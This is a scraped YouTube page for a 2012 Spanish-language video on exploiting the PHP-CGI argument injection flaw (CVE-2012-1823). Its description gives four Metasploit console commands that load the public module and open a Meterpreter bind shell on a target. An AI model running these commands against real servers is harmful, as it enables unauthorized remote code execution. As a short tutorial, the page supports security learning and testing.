Loading...

Explotando PHP-CGI con Metasploit (cve-2012-1823)

3,411 views

Loading...

Loading...

Loading...

Rating is available when the video has been rented.
This feature is not available right now. Please try again later.
Published on May 24, 2012

Al inicio de este mes se publicó una vulnerabilidad crítica para PHP que afecta a instalaciones que usan el interprete CGI (http://eindbazen.net/2012/05/php-cgi-...). Esta vulnerabilidad permite ver el código fuente de aplicaciones y ejecutar código remotamente con ayuda de otras directivas de PHP.

El proyecto Metasploit ha publicado un módulo para explotación de esta vulnerabilidad. Para explotar la vulnerabilidad con ayuda de metasploit:

use exploit/multi/http/php_cgi_arg_injection
set rhost objetivo
set PAYLOAD php/meterpreter/bind_tcp
exploit

Si es explotable se abrirá la sesión de meterpreter.

Loading...

When autoplay is enabled, a suggested video will automatically play next.

Up next


to add this to Watch Later

Add to

Loading playlists...